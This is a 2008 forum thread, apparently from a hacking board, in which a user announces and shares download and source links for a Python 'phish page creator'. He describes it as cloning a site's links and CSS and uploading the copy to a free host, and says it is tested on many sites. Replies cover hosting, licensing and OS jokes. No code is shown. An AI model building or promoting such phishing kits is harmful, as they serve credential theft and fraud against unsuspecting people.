View Full Version : Phish Creator
Mental Rental
2008-09-17, 23:26
I thought I'd share this thing I wrote. Its a phish page creator, written in python, frozen with cxfreeze. Nothing too fancy, rewrites the src, background, and href locations. It then tests to see if its valid, and if not it will rewrite it again further down the directory path. It also fixes up the CSS in the same way. It will then ftp all the files and chmod them to a T35 account (www.t35.com). Tried and tested on a lot of sites.
Gnu/Linux
http://www.evilshare.com/d8bff214-d8b6-102b-bdf3-0007e90cfb90
Windows
http://www.evilshare.com/968f7208-d8c4-102b-81f7-000b6aa2a5f8
Source is included in the tar, it can also be found:
main.py - http://pastebin.com/m62107db8
ftp_.py - http://pastebin.com/m62cd8298
phpscript.py - http://pastebin.com/mc675fbd
save__rewrite.py - http://pastebin.com/m5684b83e
final__rewrite.py - http://pastebin.com/m767e5f9d
EDIT: Added a GUI
Prometheum
2008-09-18, 01:08
Put it on a real hosting site (or better yet just post the source), make clear that it's released under an FSF-approved free software license (GPLv3 is best), and edit your original post to say Gnu/Linux instead of Linux and I'll look at it and report/fix whatever bugs I find.
Numberjumbo
2008-09-18, 04:11
Lol, I wouldn't download anything a new arrival uploads.
EDIT: I'll test it on my ubuntu on VMWare later tonight.
warweed12
2008-09-18, 05:43
who uses unbuntu ..... seriously....
Numberjumbo
2008-09-18, 10:16
who uses unbuntu ..... seriously....
what the cunt is unbuntu
God Like
2008-09-18, 11:30
windows version please
Mental Rental
2008-09-19, 00:37
Put it on a real hosting site (or better yet just post the source), make clear that it's released under an FSF-approved free software license (GPLv3 is best), and edit your original post to say Gnu/Linux instead of Linux and I'll look at it and report/fix whatever bugs I find.
Thanks. I don't really know where else to host it, I'll just leave it on rapidshit for now. Its pretty amateur based stuff. I'm still very new to python and programming in general, so any suggestions you could offer would be great.
EDIT: I'll test it on my ubuntu on VMWare later tonight.
Let me know how it goes.
extremeZ
2008-09-19, 02:37
Dude, seriously. I can make a phishing page for whatever I want to phish and it takes about 4 seconds....talk about making shit more complicated than it needs to be. In programming, it's always the easiest/most efficient way of doing things. This completely defeats the purpose of that.
Numberjumbo
2008-09-19, 04:12
Thanks. I don't really know where else to host it, I'll just leave it on rapidshit for now. Its pretty amateur based stuff. I'm still very new to python and programming in general, so any suggestions you could offer would be great.
Just leave it on there.
Prometheum
2008-09-19, 17:30
Thanks. I don't really know where else to host it, I'll just leave it on rapidshit for now. Its pretty amateur based stuff. I'm still very new to python and programming in general, so any suggestions you could offer would be great.
Evilshare is better than rapidshare. Sendspace is also good, and has no delays (or even captchas IIRC).
If it's one file, you can just put it on a pastebin-type site.
Mental Rental
2008-09-21, 02:05
Added a GUI, much better then curses. Windows version up.